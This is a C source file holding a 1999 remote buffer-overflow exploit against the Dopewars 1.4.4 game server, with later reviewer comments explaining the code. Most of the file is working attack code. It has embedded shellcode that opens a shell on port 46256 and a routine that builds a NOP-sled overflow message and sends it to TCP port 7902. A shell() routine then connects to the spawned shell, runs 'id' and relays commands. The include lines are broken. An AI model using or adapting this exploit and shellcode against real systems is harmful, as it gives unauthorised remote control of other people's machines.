/* PRIVATE Do NOT Distribute PRIVATE */
/* NOTE(review): the five header names were lost when this page was extracted;
 * only the bare directives survive. The code below uses BSD sockets,
 * gethostbyname()/inet_addr(), select() and the usual stdio/string calls. */
#include #include #include #include #include
/*
 * Dopewars by Ben Webb (Version 1.4.4 maybe older ones too).
 * This exploit will cause a shell to be created on port 46256.
 * The bug is located inside the ProcessMessage() and ExtractWordDelim()
 * functions.
 *
 * I already sent a patch to Ben Webb and he'll add it in the next release.
 *
 * Date: October 1999
 * Lamagra
 */
/* NOTE(review): historical (1999) proof of concept for a parsing bug the author
 * states was reported upstream and fixed in the following release. The comments
 * added below only describe what the code visibly does. */

/* Raw payload bytes appended to the message sent in do_expl(). Per the header
 * comment above it is meant to open a shell on port 46256; the bytes are not
 * annotated or audited here. */
char hellshell[]=
"\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9"
"\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89"
"\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4"
"\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89"
"\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10"
"\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd"
"\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f"
"\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41"
"\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45"
"\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef"
"\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31"
"\xd2\x89\x55\xe4\xcd\x80";

/* Two-byte stub copied in right after the 0x90 run in do_expl(). */
char jmpcode[]="\xeb\x0d";

/* Forward declarations. transfer() is declared but never defined in this
 * file and is never called. */
int shell(unsigned long);
void transfer(char *, int);
void do_expl(int,int,long);
unsigned long resolve(char *);

/*
 * Entry point (K&R style, implicit int return; falls off the end).
 * argv[1] is either a host name / dotted quad to connect to on TCP 7902, or
 * "-b" to bind TCP 7902 locally and wait for a single client.
 * argv[2], when present, is an absolute value if it starts with "0x"
 * (strtoul, base 0), otherwise a decimal offset (atoi) added to the default.
 */
main(int argc, char **argv)
{
    int time,offset=0,client,fd;
    struct sockaddr_in addr, clientaddr;
    long eip = 0xbffff620;          /* default value handed to do_expl() */

    if(argc < 2) {
        printf("Usage: %s {[-b] [offset]} {[hostname] [offset]}\n",argv[0]);
        exit(-1);
    }
    if(argc > 2) {
        if(!strncmp(argv[2],"0x",2))
            eip = strtoul(argv[2],0,0);
        else
            offset = atoi(argv[2]);
    }

    fd = socket(AF_INET,SOCK_STREAM,0);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(7902);

    if(strcmp(argv[1],"-b")) {
        /* Client mode: argv[1] names the peer. Up to 20 rounds; each round
         * sends one message, then calls shell(). shell() only returns when
         * its own connect() fails, so later rounds run only in that case. */
        addr.sin_addr.s_addr = resolve(argv[1]);
        for(time = 0;time < 20;time++) {
            /* Connect to server */
            while(connect(fd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1) {
                perror("can't connect to server");
                memset(addr.sin_zero,NULL,sizeof(addr.sin_zero)); /* NULL used as the fill byte */
                sleep(20);
            }
            do_expl(fd,offset,eip);
            sleep(1);
            shell(addr.sin_addr.s_addr);
            offset += 100; /* increase offset and try again */
        }
    }
    else{
        /* bind to 7902 and wait for a client */
        addr.sin_addr.s_addr = INADDR_ANY;
        if(bind(fd,(struct sockaddr *)&addr,16) == -1) {
            perror("bind");
            exit(-1);
        }
        listen(fd,5);
        bzero((char*)&clientaddr,sizeof(struct sockaddr_in));
        client = accept(fd,&clientaddr,16);
        do_expl(client,offset,eip);
        sleep(1);
        /* Calls back to whichever address connected to us. */
        shell(clientaddr.sin_addr.s_addr);
    }
    close(fd);
}

/*
 * Builds the over-long message and writes it to fd.
 * fd     - connected socket to write to
 * offset - added to addy; bumped by one if any byte of addy+offset is zero
 * addy   - base value repeated into the tail of the nops buffer
 * The message is three '^'-separated fields (nops, nops, hellshell) plus a
 * newline; '^' is presumably the delimiter ExtractWordDelim() splits on
 * (see header comment) - confirm against the target source.
 */
void do_expl(int fd,int offset, long addy)
{
    char buf[1024],*sploit;
    char nops[213];
    int x;
    long *addr_ptr;

    /* check eip for 0x0 */
    if(!(addy+offset & 0xff) || !(addy+offset & 0xff00) ||
       !(addy+offset & 0xff0000) || !(addy+offset & 0xff000000)) {
        printf("NULL detected in address\n");
        offset += 1;
    }

    /* nops[0..197] = 0x90, then the two jmpcode bytes at nops[198..199]. */
    sploit = nops;
    for(x = 0;x < 200 - strlen(jmpcode);x++)
        *(sploit++) = 0x90;
    for(x = 0;x < strlen(jmpcode);x++)
        *(sploit++) = jmpcode[x];

    printf("Using address: 0x%x\n",addy+offset);

    /* Three copies of addy+offset (12 bytes) written as longs starting at
     * nops[200]; the post-increment on sploit has no further effect. */
    addr_ptr = (long *)(sploit++);
    for(x = 0; x < 12;x+=4)
        *(addr_ptr++) = addy + offset;

    sprintf(buf,"%s^%s^%s\n",nops,nops, hellshell);
    write(fd,buf,strlen(buf));
}

/*
 * Connects to addy (network-order IPv4) on TCP 46256 and relays stdin to the
 * socket and socket data to stdout.
 * Returns -1 if connect() fails. Otherwise it never returns: the loop exits
 * the process on EOF or a read error.
 */
int shell(unsigned long addy)
{
    char buf[1024];
    fd_set set;
    int len,sockfd;
    struct sockaddr_in addr;

    addr.sin_family = AF_INET;
    addr.sin_port = htons(46256);
    addr.sin_addr.s_addr = addy;
    sockfd = socket(AF_INET,SOCK_STREAM,0);
    if(connect(sockfd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1) {
        perror("Sploit failed, connect");
        close(sockfd);
        return -1;
    }

    /* First line sent over the new connection. */
    strcpy(buf,"cd /;id;echo \"hehe success, don't do anything nasty\"\n");
    write(sockfd,buf,strlen(buf));

    /* Relay loop: whichever side is readable is copied to the other. */
    while(1) {
        FD_SET(fileno(stdin),&set);
        FD_SET(sockfd,&set);
        select(sockfd+1,&set,NULL,NULL,NULL);
        if(FD_ISSET(fileno(stdin),&set)) {
            memset(buf,NULL,1024);
            fgets(buf,1024,stdin);
            write(sockfd,buf,strlen(buf));
        }
        if(FD_ISSET(sockfd,&set)) {
            memset(buf,NULL,1024);
            if((len = read(sockfd,buf,1024)) == 0) {
                printf("EOF.\n");
                close(sockfd);
                exit(-1);
            }
            if(len == -1) {
                perror("read");
                exit(-1);
            }
            puts(buf);
        }
    }
}

/*
 * Resolves name (dotted quad first, then DNS via gethostbyname()) to a
 * network-order IPv4 address. Exits the process with a message if the
 * hostname lookup fails.
 */
unsigned long resolve(char *name)
{
    struct hostent *hp;
    unsigned long ip;

    if((ip = inet_addr(name)) == -1) {
        if((hp = gethostbyname(name)) == NULL) {
            printf("Unable to resolve <%s>\n",name);
            exit(-1);
        }
        memcpy(&ip,hp->h_addr,4); /* copies the 4 address bytes only */
    }
    return ip;
}